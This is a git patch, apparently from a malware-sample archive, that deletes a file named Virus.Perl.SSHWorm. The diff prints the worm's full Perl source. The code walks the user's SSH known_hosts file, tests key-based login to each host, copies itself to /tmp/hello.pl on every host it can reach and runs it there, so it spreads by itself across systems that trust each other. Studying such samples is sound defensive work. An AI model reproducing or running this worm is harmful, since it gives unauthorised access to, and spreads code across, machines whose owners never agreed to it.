From 8f5352451c366d4ab17732ae0743cd2d39eabc38 Mon Sep 17 00:00:00 2001
From: vxunderground <57078196+vxunderground@users.noreply.github.com>
Date: Sat, 14 Nov 2020 01:39:04 -0600
Subject: [PATCH] Delete Virus.Perl.SSHWorm

na
---
 Perl/Virus.Perl.SSHWorm | 56 -----------------------------------------
 1 file changed, 56 deletions(-)
 delete mode 100644 Perl/Virus.Perl.SSHWorm

diff --git a/Perl/Virus.Perl.SSHWorm b/Perl/Virus.Perl.SSHWorm
deleted file mode 100644
index 6f3dcfff..00000000
--- a/Perl/Virus.Perl.SSHWorm
+++ /dev/null
@@ -1,56 +0,0 @@
-###############

-

-##

-# sshworm - example of a trusted host/key ssh worm

-# 

-# This is extremely primitive and rarely works on anything

-# but identical systems running the same versions of ssh.

-# It does show how using unencrypted RSA keys for user auth

-# across an enterprise can be a really bad thing.  Eventually

-# you should be able to let this guy go running as root on any

-# given system, it will locate each user's known_hosts and

-# attempt to gain accesss, reporting its path to a central system.

-#

-##

-

-

-use FindBin qw{$Bin};

-

-

-print ":: sshworm initialized at $Bin\n";

-

-

-

-$options = " -o PasswordAuthentication=no ";

-

-##

-# stage 1 - attempt to connect to all hosts in known_hosts files

-##

-

-if (open (KH, "<" . $ENV{'HOME'} . "/.ssh/known_hosts"))

-{

-	while ($line = <KH>)

-	{

-		($host, undef) = split(/\s+/,$line);

-		($host, undef) = split(/\,/,$host);

-		Propagate($host);

-	}

-	close (KH);

-}

-

-

-sub Propagate {

-

-	open (SSH, "ssh $options $host 'id' 2>/dev/null|");

-	while ($out = <SSH>)

-	{

-		if ($out =~ /uid/)

-		{

-			print ":: sshworm found new host $host\n";

-			system("scp $Bin/$0 $host:/tmp/hello.pl");

-			system("ssh $host 'perl /tmp/hello.pl'");

-		}

-	}

-	close (SSH);

-}

-